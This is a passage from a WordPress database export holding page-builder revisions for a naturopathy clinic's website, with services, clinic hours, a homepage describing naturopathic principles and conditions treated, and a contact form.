header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" custom_padding=\"7px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\" title_text=\"Untitled design\" background_enable_image=\"on\" parallax=\"on\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-09 21:13:12','2025-04-09 13:13:12','',424,'https://verdenaturopathy.com.au/?p=463',0,'revision','',0),(466,1,'2025-04-09 21:17:29','2025-04-09 13:17:29','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" saved_tabs=\"all\" locked=\"off\" title_text=\"Untitled design\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" background_enable_image=\"on\" parallax=\"on\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2025-04-09 21:17:29','2025-04-09 13:17:29','',188,'https://verdenaturopathy.com.au/?p=466',0,'revision','',0),(472,1,'2025-04-09 21:29:56','2025-04-09 13:29:56','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">the healing power of nature</span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">treat the person as a whole</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">We can support health in many conditions, including:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></li>\n<li><span style=\"font-family: Montserrat;\">nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></li>\n<li><span style=\"font-family: Montserrat;\">metabolic dysfunction (insulin resistance)</span></li>\n<li><span style=\"font-family: Montserrat;\">immune dysfunction (autoimmunity, recurrent infections)</span></li>\n<li><span style=\"font-family: Montserrat;\">thyroid conditions (hyper/hypothyroidism)</span></li>\n<li><span style=\"font-family: Montserrat;\">women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></li>\n<li><span style=\"font-family: Montserrat;\">skin health (acne, eczema/dermatitis, rosacea)</span></li>\n<li><span style=\"font-family: Montserrat;\">cardiovascular health (chronic inflammation, high cholesterol)</span></li>\n<li><span style=\"font-family: Montserrat;\">men\'s health (prostate issues, sexual health)</span></li>\n<li><span style=\"font-family: Montserrat;\">children\'s health (poor immunity, digestive issues, behavioural issues)</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></p>\n<p><span style=\"font-family: Montserrat;\">We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" background_enable_image=\"on\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-04-09 21:29:56','2025-04-09 13:29:56','',28,'https://verdenaturopathy.com.au/?p=472',0,'revision','',0),(471,1,'2025-04-09 21:27:39','2025-04-09 13:27:39','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" min_height=\"0px\" custom_margin=\"||1px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" min_height=\"209.5px\" custom_padding=\"||38px|||\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"550px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" hover_enabled=\"0\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\" sticky_enabled=\"0\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: 